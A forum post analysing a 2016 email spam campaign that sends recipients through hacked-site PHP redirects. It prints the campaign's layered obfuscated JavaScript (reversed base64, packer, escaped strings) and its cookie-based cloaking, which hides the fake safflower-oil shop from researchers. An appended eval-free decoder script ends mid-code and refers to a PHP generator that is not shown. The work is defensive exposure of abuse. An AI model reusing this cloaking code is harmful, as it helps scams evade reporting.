Save The Children = Safflower Oil Spammers in stealth mode

This is transferred to the new board at http://fraudreports.prophpbb.com
Spammers should not profit, so post information here that hits their pockets.

Postby spamislame » Thu Feb 04, 2016 4:40 pm

So I have an update on this whole "Save the Children" spam campaign we've been seeing lately.

It took a while and a bit of extra digging just due to how deeply this group obfuscates their code.

Of course there is NOTHING altruistic about this spam campaign.

So here we go...

Spam arrives; in the case of the test group I'm being provided messages from, they always have these characteristics:

  • They are "from" a friend of yours, and sent to you and other friends you probably both know.
  • Usually "from" a Yahoo Mail account that was compromised at least 6 - 12 months ago.
  • Usually sent to that person's address book at the time that account was compromised.
  • Lately they don't care whether they quote the original Yahoo Mail account or not in the "from". They'll just make up a fake domain.
  • Subject line is either "Hey" or "Re:"
  • Contents are only the spammed url.
  • Spam (usually) sent to 7 recipients at a time, usually several times a day.
  • Always claims to be "Sent from Yahoo Mail for iPhone"

So in today's example if the friend's name was registered as "Fred Flintstone" and the Yahoo Mail account was originally "fredflintstone@yahoo.com", and the spam was sent to his friends which were swiped from his Yahoo account we get something like this as the spam message (genuine header minus the obvious replacements):

Code:
Delivered-To: bettyrubble@yahooothermail.com
Received: by 10.107.41.210 with SMTP id p201csp1448301iop;
        Wed, 3 Feb 2016 04:17:36 -0800 (PST)
X-Received: by 10.28.63.200 with SMTP id m191mr3410925wma.21.1454501856316;
        Wed, 03 Feb 2016 04:17:36 -0800 (PST)
Return-Path: <FredFlintstone@teleperf.com>
Received: from smtp-out02.msg.oleane.net (smtp-out02.msg.oleane.net. [62.161.3.11])
        by mx.google.com with ESMTP id n11si12270029wmd.46.2016.02.03.04.17.35;
        Wed, 03 Feb 2016 04:17:36 -0800 (PST)
Received-SPF: neutral (google.com: 62.161.3.11 is neither permitted nor denied by best guess record for domain of FredFlintstone@teleperf.com) client-ip=62.161.3.11;
Authentication-Results: mx.google.com;
       spf=neutral (google.com: 62.161.3.11 is neither permitted nor denied by best guess record for domain of FredFlintstone@teleperf.com) smtp.mailfrom=FredFlintstone@teleperf.com
Received: from smtp08.msg.oleane.net (smtp08.mail.priv [172.17.20.117])
   by smtp-out02.msg.oleane.net with ESMTP id u13CHXEf015800;
   Wed, 3 Feb 2016 13:17:33 +0100
Received: from smtp.teleperf.com (bba402277.alshamil.net.ae [83.110.143.195]) (authenticated)
   by smtp08.msg.oleane.net (MTA) with ESMTP id u13CHSSP010320;
   Wed, 3 Feb 2016 13:17:29 +0100
X-Oleane-Rep: REPA
Date: Tue, 3 Feb 2016 01:17:29 +0000
From: Fred Flintstone <FredFlintstone@teleperf.com>
To: "Wilma" <wilmaflintstone@somedomain.com>, "Rubble" <bettyrubble@yahooothermail.com>,
     "Dino" <dino@mydomain.com> [...]
Message-ID: <fdab7e41338d$cc9c673e$20a6e5fa$@teleperf.com>
Subject: Re:
MIME-Version: 1.0
Content-Type: multipart/alternative;
   boundary="----=_NextPart_000_2E19_4210C38B.3168B45F"
   
X-Backend: vm-smtp-sophos17v3
X-Spam-Flag: YES
X-PMX-Spam: Probability=84%
X-Spam-Level: XXXXXXXX
X-PFSI-Info: PMX 6.0.0.2142326, Antispam-Engine: 2.7.2.2107409, Antispam-Data: 2016.2.3.120616 (no antivirus check)
X-Orange-Auth: YS5sZXRyZW5AdGVsZXBlcmYuY29t

------=_NextPart_000_2E19_4210C38B.3168B45F
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable


  blockquote, div.yahoo_quoted { margin-left: 0 !important; border-left:1px=
 #715FFA solid !important;  padding-left:1ex !important; background-color:w=
hite !important; }  http://bnoshop.com/might.php=C2=A0 =C2=A0


Fred Flintstone
Sent from Yahoo Mail for iPhone
 =C2=A0 =C2=A0
------=_NextPart_000_2E19_4210C38B.3168B45F
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: 7bit

<div><br></div>
                <style type="text/css" scoped="">
                    blockquote, div.yahoo_quoted {
                        margin-left: 0 !important;
                        border-left:1px #715FFA solid !important;
                        padding-left:1ex !important;
                        background-color:white !important;
                    }
                </style>
                <a href="http://bnoshop.com/might.php"><a href="http://bnoshop.com/might.php" target="_blank">http://bnoshop.com/might.php</a></a>&nbsp; &nbsp;<br><br><br>Fred Flintstone<br><a href="https://yho.com/footer0">Sent from Yahoo Mail for iPhone</a><br>
            <div>&nbsp; &nbsp;</div>
------=_NextPart_000_2E19_4210C38B.3168B45F--


Nothing really new there other than the fact that the sending mail server is usually located somewhere in the Middle East, typically Iran, Saudi Arabia, or as in this case the United Arab Emirates.

But here is why we have recently seen these "save the children" responses: They sense whether you are researching the URL or not.

If you use a tool like wget or curl or wheregoes or anything else, a cookie they are expecting to see will not be written, and the result will be that you're redirected to one or another charity site. Previously it was save the children but today I notice it switched to "help-save-wildlife.net".

Here is the breakdown of the spammed url.

Original spammed url:

http://bnoshop.com/might.php

bnoshop.com is of course a hacked web server. In this case it's an e-commerce site selling toiletries and snacks. (Tim Tams! ;) )

In many cases the main website either doesn't exist or has been badly broken through some kind of misconfiguration. Hackers placed this php script on this server. There are usually dozens of these throughout the entire site directory structure.

That php script chooses from one of (usually) three redirection targets and sends you there via a JavaScript redirect.

Yesterday the above spam message had three redirects:

Code:
Spammed url:
http://bnoshop.com/might.php

Redirect:
http://zhevnp.com/?a=370951&c=uwl&s=03BAM
http://axonk.com/?a=370951&c=uwl&s=03BAM
http://lapagn.com/?a=370951&c=uwl&s=03BAM


Today it was only one:

Code:
Spammed url:

Redirect:
http://elyzj.com/?a=370951&c=uwl&s=03BAM


But here's a collection of several from previous days:

Code:
Spammed url:
http://www.cytnet.com.ar/yet.php

Redirects:
http://jifgjt.com/?a=370951&c=uwl&s=05MIX
http://hzvziy.com/?a=370951&c=uwl&s=05MIX
http://trtvb.com/?a=370951&c=uwl&s=05MIX

Spammed url:
http://cobaltvc.com/open.php

Redirects:
http://okxunk.net/?a=370951&c=uwl&s=29MIX
http://bfgfz.net/?a=370951&c=uwl&s=29MIX

Spammed url:
http://www.cytnet.com.ar/yet.php

Redirects:
http://pactz.net/?a=370951&c=wl_con&s=05MIX
http://dshbn.net/?a=370951&c=wl_con&s=05MIX
http://zxgaie.net/?a=370951&c=wl_con&s=05MIX


Etc.

Anyway let's continue down that path.

Using sneakier means, I trace the output of that redirect:

http://elyzj.com/?a=370951&c=uwl&s=03BAM

(Cleaned up for forum readability)

Code:
<!DOCTYPE html>
<html>
    <head>
        <script language="javascript" type="text/javascript">
            var O1O='=oQKpkyJ8dCK0lGbwNnLnIXY2xXZ0lmc3xXMzADM1xHMzADM1xHduVWb1N2bkx
                  XY3ADM1xnZzADM1xnZ0ADM1xXZwF2YzVmb1xnMyADM1xXY2ADM1xHf8hzNwATd8RzMwATd8
                  ZjMwATd8V2MwATd8J2NwATd8RmNwATd8R2NwATd8ZWNwATd8djMwATd8F2MwATd8J2MwATd
                  8N2MwATd8lzNwATd8VDNwATd8hjNwATd8ZzNwATd8RmMwATd8VzNwATd8FjMwATd8dzNwAT
                  d8BzNwATd8ljMwATd8djNwATd8JjNwATd8NjNwATd8ZjNwATd8ZmMwATd8FGMwATd8lDMwA
                  Td8R2MwATd8NzNwATd8VGchN2cl9FfycDMwUHf0cDMwUHf5ITM8JjN8ZTN8VmNwATd8ljNw
                  ATd8FjNwATd8NmNwATd8VmMwATd8RjNwATd8hjMwATd8JmNwATd8BjMwATd8ZmNwATd8VjN
                  wATd8xWY2VGf0lGbwNHf05WSlNnchBHfwhXRnVmU8VGZvNkchh2Qt9mcmx3Zulmc0N1b0x3
                  dl5GfmlGfn5WayR3U8xXZslGa3xXZjFGbwVmc852bpR3YuVnZ85mc1RXZyxHf8xHf8xHf8x
                  Hf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8
                  xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf
                  8xHf8xHf8xHf8xHf8dCL0AjMsIjNscSKp03esADLpcCX8dCXogmMucCXTJDfSJDfVJDfWJD
                  fZJDfwMDfYJDfXJDfRJDfQJDfKJDfJJDfIJDfLJDfMJDfPJDfOJDfNJDfaJDf5MDfoNDflN
                  DfjNDfmNDfnNDfkNDfhNDfzMDfyMDfxMDfiNDf0MDf3MDf4MDfUJDf6JDfvJDfsJDf1MDfhJ
                  DfnJDfpJDfmJDfuJDflJDfoJDf3IDfjJDfiJDf4IDf5IDfkJDf2MDfqJDfrJDftJDfGJDfBJ
                  DfwJDfCJDfDJDfFJDfEJDf5JDf4JDfzJDfyJDfHJDfxJDf0JDf1IDf1JDf2IDf8xHf8xHf8x
                  Hf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8dCXscnMsY
                  nMscCXpkSKnwFXcx3JcxFXowWMucCXcxFSxw3RxwnRxwXSxwnSxwHTxw3SxwXRxwHRxwnTxw
                  3dxwndxwXexwnexw3QxwnQxwXQxwXTxwHVxwnWxwXMywXWxwHWxwHMywHNyw3MywnMywnVxw
                  XUxwHUxw3Vxw3TxwnUxw3UxwXVxwHexwnbxw3NxwnNxwXNxwHOxwXOxwnYxwXYxwHNxwXdxw
                  3MxwXW8pFfYxHMxwnMxwXMxw3YxwHdxwHZxcCXcxFLWxiVscCXcx1OpkSSo8EKT5iU7cCXcx
                  FXcxFXFVCNl4WJzUSOlcTJlVyZloUJiVydlIWJ0VCelcWJ0UCMlYTJmVCMlMWJzUCOlEWJ4U
                  yMlIXJxVCMlMXJ1USZlEXJuVCOlATJwVyZlcWJ6ViblQTJ0UCclgXJxUSalETJjVCMlkTJwV
                  iZlYTJyUyMlQTJ1UyNlITJ4UiZlIXJyUSYlYTJzUiclETJxUSMlETJiVSQlETJwUSZlgTJwU
                  SMlcXJiVCdlgXJnVCOlMTJyUSclkTJwUiclITJ4UyYlMWJ1USZlEXJ1UCOlcTJxVSOlcWJ2V
                  SNlEWJ2VSOlATJzVCMlcWJ3UiQlITJkViNlATJnVyQlITJ3UiZlgUJRVidlgTJwUiZlAXJ0U
                  COlUTJwUCclEXJMVCUlwUJnVyZloXJuVCNlQTJwVCelETJpVSMlMWJwUSOlAXJmViNlITJzU
                  CNlUTJ3UiMlgTJmViclITJhViNlMTJyVSMlETJxUSMlIWJBVSMlwWJsVialEWJwUCOl0WJ1U
                  iNlATJ5VSZlATJzUCZlITJyUyNlkXJwUSOlUTJqVSMlMWJzUiYlcXJiVCdlwWJhVCMlgTJtV
                  SNlYTJ1VCMlMTJkViMlITJ3UialETJ2USOl8WJ0UCMlkTJoViYlcXJoViYlQXJwUSZlgTJ1U
                  yYlETJ6VSMlATJvVSOlQTJxUCRlETJsVCVlEXJxUSalsUJxUCblsWJwUyMlQWJyUiMlcTJ0U
                  SZlATJ0UyaloWJjVSTlcUJwUSYlYTJzUiZlATJzUCZlITJyUyNlYWJ0UiNlATJDVyblcTJyU
                  SYloWJxUSalETJhVCMlgTJtVSNlYTJ1VCMlMTJkViMlITJ3UCalgWJiVCdlsWJwUyMlQWJyU
                  iMlcTJ0USZlATJ0UyalkWJwUyMlQWJyUiMlcTJmVCNlYTJwUyQl8WJ3UiMlEWJoVCalIWJxU
                  SQlgWJiVCblEWJwUCOl0WJ1UiNlUXJwUyMlQWJyUiMlcTJLVSMlYUJGVSMlsWJhVCMlYTJzU
                  yYlATJhViNl8WJrVSMlkWJpVSMlEWJwUCOl0WJ1UiNlUXJwUyMlQWJyUiMlcTJmVSOlITJ0U
                  SNlIUJzUyclUTJ2USMlMWJyUCMl4WJ2VCNloWJxUyYlMTJoViYlIWJ0VCMlUWJ4USNlMWJxU
                  ielETJwUyblkTJ0USMlQUJxUCblEWJwUCOl0WJ1UiNlUXJwUyMlQWJyUiMlcTJmVSOlITJ0U
                  SNlIUJzUyclUTJ2UialETJpVSMlEWJwUCOl0WJ1UiNlUXJwUyMlQWJyUiMlcTJxUSOlUTJzV
                  CalIWJBViYlwWJqVSYlATJ4USblUTJ2UCMlkXJlVCMlMTJkViMlITJ3USelATJ5USNlETJ2U
                  iMlMTJ0UyNlYTJvVyYlIWJFVyalQTJuVyMlkTJ3USZlUTJzVSNlgUJnVCNlcUJwUCNlsWJpV
                  CMl4WJ2VCNlETJ0UiblMTJ5UyNlUWJKVyJcxFXcxFXc1TSg40JcxFXo0HcgcVf9lSXjt1ask
                  yJcxFXndCXcxFLnwFXcJGXcxFXcxFXcdCXcx1KpMGKltyJcxFXixFXcxFXcxFXnwFXchybxA
                  iaxgyax4Cc9A3ep01YbtGKpFzep0SLjhCaxsTfpkSZxgiZx4yY6kyZxsyYo0WMuIXM/MXM+k
                  SYlMWPjhCKrkSKpE2LjhScxgSZ6cCXcx1JcxFX/EGPjhyV7lyYoUVPltXKkxSZssGLjxSYsA
                  HKVhCcxcCXo0HcgUjM91XKdN2WrxSKnw1ZnwFLnwlYcxFXcdCXrkyYoU2KnwlYcxFXcdCXoY
                  mMgMmMocjMuAXPwtXKdN2WrhiYysXKt0yYogjM70XM9M2O9dCXrcHXcxFXnwVNysXKoYjM9U
                  2Od1XXltFZgUjM7lSZoYjMb1za9lyYoUGf811YbtWPdlyYoU2WktXKt0yYogjM7lSKhJDLv4
                  1LocjMucCXnwVIoImM70XKpYzMoQmMuMmOpkjMrMGKlJjLhJzP1MjPpEWJj1zYogyKpkSKh9
                  yYocmMoUmOnw1Jc9TY8MGK1IzepMGK2ITPltXKkxSZssGLjxSYsAHK2IDKpJzJo0Hcg4mc1R
                  XZy1Xfp01YbtGLpcyZnwyJixFXnsSKjhSZrciYcx1JoAHeFdWZSBydl5GKlNWYsBXZy5Cc9A
                  3ep01YbtGKml2ep0SLjhSZslGa3tTfpkiNzgyZulmc0N1b05yY6kSOysyYoUGZvNkchh2Qt9
                  mcm5yZulmc0N1P1MjPpEWJj1zYogyKpkSKh9yYoQnbJV2cyFGcoUmOncyPhxzYo4mc1RXZyt
                  XKjhibvlGdj5Wdm1TZ7lCZsUGLrxyYsEGLwhibvlGdj5WdmhCbhZXZ';
            function l1l(data){
               var O0IlOI="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
               var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc='';
               do{
                  h1=O0IlOI.indexOf(data.charAt(i++));h2=O0IlOI.indexOf(data.charAt(i++));h3=O0IlOI.indexOf(data.charAt(i++));
                  h4=O0IlOI.indexOf(data.charAt(i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;
                  if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64){enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}
               }while(i<data.length);
               return enc
            }
            function O0I(string){ var ret = '', i = 0;   for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }
            eval(l1l(O0I(O1O)));
      </script>
    </head>
    <body>
    </body>
</html>


Pretty clever right? Obfuscate everything, making it harder to report. Challenge accepted.

Using sneakier means again, I figure out what that is outputting:

(Again: cleaned up for output here)

Code:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)
))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){i
f(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return
p}('2i(26(p,a,c,k,e,d){e=26(c){25(c<a?\'\':e(2g(c/a)))+((c=c%a)>35?2a.
2e(c+29):c.2d(36))};2b(!\'\'.27(/^/,2a)){28(c--){d[e(c)]=k[c]||e(c)}k=
[26(e){25 d[e]}];e=26(){25\'\\\\w+\'};c=1};28(c--){2b(k[c]){p=p.27(2c
2f(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}25
p}(\'1p(U(p,a,c,k,e,d){e=U(c){W(c<a?\\\'\\\':e(1q(c/a)))+((c=c%a)>1s?1
r.1m(c+1g):c.1f(1e))};1h(c--){1i(k[c]){p=p.1k(1j
1o(\\\'\\\\\\\\b\\\'+e(c)+\\\'\\\\\\\\b\\\',\\\'g\\\'),k[c])}}W
p}(\\\'N
I=\\\\\\\'%J%e%7%9%3%n%4%1%4%v%n%0%i%k%4%0%G%4%g%H%5%s%5%e%7%9%3%n%4%k
%E%b%c%o%6%7%4%3%2%6%1%5%9%0%y%7%2%2%d%3%0%e%y%0%6%5%m%8%0%a%j%l%b%A%b
%h%s%5%9%1%7%2%2%d%3%0%u%6%5%m%8%0%a%1%i%1%j%6%5%s%3%B%5%4%2%9%f%7%2%2
%d%3%0%u%6%5%m%8%0%a%l%1%D%1%4%9%o%0%1%z%1%c%5%8%e%0%t%b%b%h%3%c%1%j%4
%v%n%0%2%c%1%6%5%s%3%B%5%4%2%9%f%7%2%2%d%3%0%u%6%5%m%8%0%a%1%i%i%1%k%o
%6%a%0%c%3%6%0%a%k%1%F%F%1%K%7%2%2%d%3%0%u%6%5%m%8%0%a%l%b%h%A%1%b%h%h
%a%2%7%o%C%0%6%4%f%7%2%2%d%3%0%i%k%4%0%e%4%7%2%2%d%3%0%k%t%b%h%h%7%2%2
%d%3%0%u%6%5%m%8%0%a%1%i%1%j%a%2%7%o%C%0%6%4%f%7%2%2%d%3%0%f%3%6%a%0%G
%M%c%j%k%4%0%e%4%7%2%2%d%3%0%k%l%1%K%i%1%q%T%l%1%D%1%4%9%o%0%1%z%1%c%5
%8%e%0%t%b%h%w%b%h%9%0%4%o%9%6%1%j%7%2%2%d%3%0%u%6%5%m%8%0%a%l%t%b%w%b
%3%c%1%j%5%9%0%y%7%2%2%d%3%0%e%y%0%6%5%m%8%0%a%j%l%l%1%A%b%1%1%1%1%r%3
%6%a%2%r%f%8%2%7%5%4%3%2%6%f%p%9%0%c%1%i%1%x%p%4%4%n%z%g%g%L%P%L%q%p%0
%5%8%4%p%f%0%8%v%Q%H%f%7%2%C%g%0%6%d%2%B%7%g%0%s%0%9%v%a%5%v%g%9%q%7%8
%5%q%e%5%c%c%8%2%r%0%9%q%2%3%8%g%x%t%b%w%1%0%8%e%0%1%A%b%1%1%1%1%r%3%6
%a%2%r%f%8%2%7%5%4%3%2%6%f%p%9%0%c%1%i%1%x%p%4%4%n%z%g%g%p%0%8%n%q%e%5
%s%0%q%r%3%8%a%8%3%c%0%f%6%0%4%g%x%t%b%w%b%J%g%e%7%9%3%n%4%E\\\\\\\';R
.S(O(I));\\\',V,V,\\\'1d|1t|1c|11|12|10|X|Z|Y|13|1u|14|1a|1b|19|18|15|
16|17|1n|1x|1U|1S|1R|1O|1W|1P|1Q|1V|22|23|24|20|1X|1Y|21|1Z|1T|1M|1A|1
B|1C|1z|1y|1v|1w|1N|1D|1E|1K|1L|1J|1I|1F|1G|1H\\\'.1l(\\\'|\\\')))\',2
v,2w,\'||||||||||||||||||||||||||||||||||||||||||||||||||||||||26|2u|2
5|2t|2q|2G|2r|2s|2x|2y|2D|2E|2C|2B|2p|2A|2F|2m|2k|2j|36|2d|29|28|2b|2c
|27|2h|2e|2n|2f|2i|2g|2a|35|2l|2o|2z|2T|38|37|34|3b|31|32|33|3a|3d|3g|
3f|3c|3e|3h|39|2Z|2M|2N|2O|2L|2K|2H|2I|2J|2P|2Q|2W|2X|30|2Y|2V|2U|2R|2
S\'.2h(\'|\'),0,{}))',62,204,'||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|||||||||||||||||||return|function|replace|while||String|if|new|toStri
ng|fromCharCode|RegExp|parseInt|split|eval|u0065|u006f|u0020|u006b|u00
28|u0064|u002e|u006c|u0061|u0069|u006e|56|62|129|u0074|u0072|_escape|u
0073|u003d|u0009|u000a|u002f|u0066|u0063|u0062|u0067|u0029|u0070|u0077
|u0021|u0075|u002d|u0076|u0068|u0045|u0079|u003c|u003b|u003a|u0027|u00
5f|u007d|u006d|u007b|u003e|u0026|u0034|u0078|||u006a|u0022|unescape|u0
04f|u003f|u007a|document|u0030|u0031|write|var'.split('|')))


But we're not done:

Code:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))
+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[
c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('N
I=\'%J%e%7%9%3%n%4%1%4%v%n%0%i%k%4%0%G%4%g%H%5%s%5%e%7%9%3%n%4%k%E%b%c%o
%6%7%4%3%2%6%1%5%9%0%y%7%2%2%d%3%0%e%y%0%6%5%m%8%0%a%j%l%b%A%b%h%s%5%9%1
%7%2%2%d%3%0%u%6%5%m%8%0%a%1%i%1%j%6%5%s%3%B%5%4%2%9%f%7%2%2%d%3%0%u%6%5
%m%8%0%a%l%1%D%1%4%9%o%0%1%z%1%c%5%8%e%0%t%b%b%h%3%c%1%j%4%v%n%0%2%c%1%6
%5%s%3%B%5%4%2%9%f%7%2%2%d%3%0%u%6%5%m%8%0%a%1%i%i%1%k%o%6%a%0%c%3%6%0%a
%k%1%F%F%1%K%7%2%2%d%3%0%u%6%5%m%8%0%a%l%b%h%A%1%b%h%h%a%2%7%o%C%0%6%4%f
%7%2%2%d%3%0%i%k%4%0%e%4%7%2%2%d%3%0%k%t%b%h%h%7%2%2%d%3%0%u%6%5%m%8%0%a
%1%i%1%j%a%2%7%o%C%0%6%4%f%7%2%2%d%3%0%f%3%6%a%0%G%M%c%j%k%4%0%e%4%7%2%2
%d%3%0%k%l%1%K%i%1%q%T%l%1%D%1%4%9%o%0%1%z%1%c%5%8%e%0%t%b%h%w%b%h%9%0%4
%o%9%6%1%j%7%2%2%d%3%0%u%6%5%m%8%0%a%l%t%b%w%b%3%c%1%j%5%9%0%y%7%2%2%d%3
%0%e%y%0%6%5%m%8%0%a%j%l%l%1%A%b%1%1%1%1%r%3%6%a%2%r%f%8%2%7%5%4%3%2%6%f
%p%9%0%c%1%i%1%x%p%4%4%n%z%g%g%L%P%L%q%p%0%5%8%4%p%f%0%8%v%Q%H%f%7%2%C%g
%0%6%d%2%B%7%g%0%s%0%9%v%a%5%v%g%9%q%7%8%5%q%e%5%c%c%8%2%r%0%9%q%2%3%8%g
%x%t%b%w%1%0%8%e%0%1%A%b%1%1%1%1%r%3%6%a%2%r%f%8%2%7%5%4%3%2%6%f%p%9%0%c
%1%i%1%x%p%4%4%n%z%g%g%p%0%8%n%q%e%5%s%0%q%r%3%8%a%8%3%c%0%f%6%0%4%g%x%t
%b%w%b%J%g%e%7%9%3%n%4%E\';R.S(O(I));',56,56,'u0065|u0020|u006f|u0069|u0
074|u0061|u006e|u0063|u006c|u0072|u0064|u000a|u0066|u006b|u0073|u002e|u0
02f|u0009|u003d|u0028|u0022|u0029|u0062|u0070|u0075|u0068|u002d|u0077|u0
076|u003b|u0045|u0079|u007d|u0027|u005f|u003a|u007b|u0067|u006d|u003f|u0
03e|u0026|u0078|u006a|_escape|u003c|u0021|u0034|u004f|var|unescape|u0030
|u007a|document|write|u0031'.split('|')))


One more:

Code:
var
_escape='%u003c%u0073%u0063%u0072%u0069%u0070%u0074%u0020%u0074%u0079%u0
070%u0065%u003d%u0022%u0074%u0065%u0078%u0074%u002f%u006a%u0061%u0076%u0
061%u0073%u0063%u0072%u0069%u0070%u0074%u0022%u003e%u000a%u0066%u0075%u0
06e%u0063%u0074%u0069%u006f%u006e%u0020%u0061%u0072%u0065%u005f%u0063%u0
06f%u006f%u006b%u0069%u0065%u0073%u005f%u0065%u006e%u0061%u0062%u006c%u0
065%u0064%u0028%u0029%u000a%u007b%u000a%u0009%u0076%u0061%u0072%u0020%u0
063%u006f%u006f%u006b%u0069%u0065%u0045%u006e%u0061%u0062%u006c%u0065%u0
064%u0020%u003d%u0020%u0028%u006e%u0061%u0076%u0069%u0067%u0061%u0074%u0
06f%u0072%u002e%u0063%u006f%u006f%u006b%u0069%u0065%u0045%u006e%u0061%u0
062%u006c%u0065%u0064%u0029%u0020%u003f%u0020%u0074%u0072%u0075%u0065%u0
020%u003a%u0020%u0066%u0061%u006c%u0073%u0065%u003b%u000a%u000a%u0009%u0
069%u0066%u0020%u0028%u0074%u0079%u0070%u0065%u006f%u0066%u0020%u006e%u0
061%u0076%u0069%u0067%u0061%u0074%u006f%u0072%u002e%u0063%u006f%u006f%u0
06b%u0069%u0065%u0045%u006e%u0061%u0062%u006c%u0065%u0064%u...74%u0069%u
006f%u006e%u002e%u0068%u0072%u0065%u0066%u0020%u003d%u0020%u0027%u0068%u
0074%u0074%u0070%u003a%u002f%u002f%u0034%u0030%u0034%u002d%u0068%u0065%u
0061%u006c%u0074%u0068%u002e%u0065%u006c%u0079%u007a%u006a%u002e%u0063%u
006f%u006d%u002f%u0065%u006e%u006b%u006f%u0067%u0063%u002f%u0065%u0076%u
0065%u0072%u0079%u0064%u0061%u0079%u002f%u0072%u002d%u0063%u006c%u0061%u
002d%u0073%u0061%u0066%u0066%u006c%u006f%u0077%u0065%u0072%u002d%u006f%u
0069%u006c%u002f%u0027%u003b%u000a%u007d%u0020%u0065%u006c%u0073%u0065%u
0020%u007b%u000a%u0020%u0020%u0020%u0020%u0077%u0069%u006e%u0064%u006f%u
0077%u002e%u006c%u006f%u0063%u0061%u0074%u0069%u006f%u006e%u002e%u0068%u
0072%u0065%u0066%u0020%u003d%u0020%u0027%u0068%u0074%u0074%u0070%u003a%u
002f%u002f%u0068%u0065%u006c%u0070%u002d%u0073%u0061%u0076%u0065%u002d%u
0077%u0069%u006c%u0064%u006c%u0069%u0066%u0065%u002e%u006e%u0065%u0074%u
002f%u0027%u003b%u000a%u007d%u000a%u003c%u002f%u0073%u0063%u0072%u0069%u
0070%u0074%u003e';document.write(unescape(_escape));


And finally:

Code:
<script type="text/javascript">
function are_cookies_enabled()
{
   var cookieEnabled = (navigator.cookieEnabled) ? true : false;

   if (typeof navigator.cookieEnabled%u...74ion.href = 'http://404-health.elyzj.com/enkogc/everyday/r-cla-safflower-oil/';
} else {
    window.location.href = 'http://help-save-wildlife.net/';
}
</script>


That doesn't look quite right to me, but that's what I get out of it, and it's what I see when I inspect elements on the resulting page before it redirects.

All that! Just to output 10 lines of basic JavaScript!

We can see that they're doing some basic check for cookie functionality. If it doesn't pass: you get the charity site. If it does: you get the stupid fake safflower oil site.

In other words: genuine browser = you're a typical human, otherwise you are probably investigating where this is hosted via automated means.

I've also noticed that in many, many cases they are doing some specific blocking of IP addresses, notably those of the abuse departments of hosting companies affected by these hacks which have placed these php files on the server in the first place. The response is a straight 404 error for a preset audience, making it that much more difficult to report these sites. I've had to argue with several abuse teams to convince them that the malicious file actually is there. It took ages.

If this isn't a sign that reporting these hacks is impacting their business, I don't know what is. Look at the ridiculous lengths this group has gone to to throw someone off their path.

Anyway: that is what's really going on here.

SiL / IKS / concerned citizen
spamislame
Site Admin
 
Posts: 5057
Joined: Tue May 09, 2006 9:18 am
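The chain SiL walks through above is four mechanical encoding layers stacked on top of ten lines of JavaScript: a reversed base64 string, Dean Edwards' p,a,c,k,e,d packer, a %u-escaped string handed to unescape(), and (in the PHP generator SiL posts later in this thread) a byte array shifted by a random offset. As an added example that is not code from the thread, the Node.js script below undoes each layer statically, without ever calling eval(); every sample input is constructed here to mirror the page's samples, and x.test is a placeholder host, not one from the spam.

```javascript
// Added example, not code from the forum post: eval-free deobfuscation of
// the four layers seen in the spammed redirect pages. Sample inputs are
// constructed to mirror the page's samples; "x.test" is a placeholder.

// Layer 1: O1O held a base64 string stored reversed. O0I() reversed it
// back and l1l() was an ordinary base64 decoder (RFC 4648 alphabet).
function decodeReversedBase64(blob) {
  const b64 = blob.split('').reverse().join('');
  // l1l() emitted one char per byte (String.fromCharCode), i.e. latin1
  return Buffer.from(b64, 'base64').toString('latin1');
}

// Layer 2: Dean Edwards' p,a,c,k,e,d packer. Instead of letting eval()
// run the unpacker, apply the same word substitution ourselves.
function unpackPacker(p, a, c, k) {
  // e(n): index -> token; base-36 digits 0-9a-z, then A-Z via n+29
  const e = (n) => (n < a ? '' : e(Math.floor(n / a))) +
    ((n %= a) > 35 ? String.fromCharCode(n + 29) : n.toString(36));
  while (c--) {
    if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
  }
  return p;
}

// Layer 3: the _escape literal fed to unescape(); handles %uXXXX and %XX.
function jsUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u4, u2) => String.fromCharCode(parseInt(u4 || u2, 16)));
}

// Layer 4: the PHP js() function emits "<n>a=<diff>; <n>b=[byte+diff,...]"
// and rebuilds the string with fromCharCode(b[d]-a); undo the offset.
// Returns null when the source does not carry that pattern.
function decodeOffsetArray(src) {
  const m = /([A-Za-z_]\w*)a=(\d+);\s*\1b=\[([\d,\s]+)\]/.exec(src);
  if (!m) return null;
  const diff = Number(m[2]);
  return m[3].split(',')
    .map((n) => String.fromCharCode(Number(n) - diff)).join('');
}

// Constructed samples, one per layer.
const SAMPLE_L1 = '=sTM9gHIyFmd'; // reversed base64 of "var x=1;"
const SAMPLE_L2 = {                // packs: var _escape='%u0068%u0069';...
  p: "0 1='%u0068%u0069';2.3(4(1));",
  a: 62,
  c: 5,
  k: 'var|_escape|document|write|unescape'.split('|'),
};
// bytes of "window.top.location.href='http://x.test/';" each shifted by 3
const L4_BYTES = [122, 108, 113, 103, 114, 122, 49, 119, 114, 115, 49, 111,
  114, 102, 100, 119, 108, 114, 113, 49, 107, 117, 104, 105, 64, 42, 107,
  119, 119, 115, 61, 50, 50, 123, 49, 119, 104, 118, 119, 50, 42, 62];
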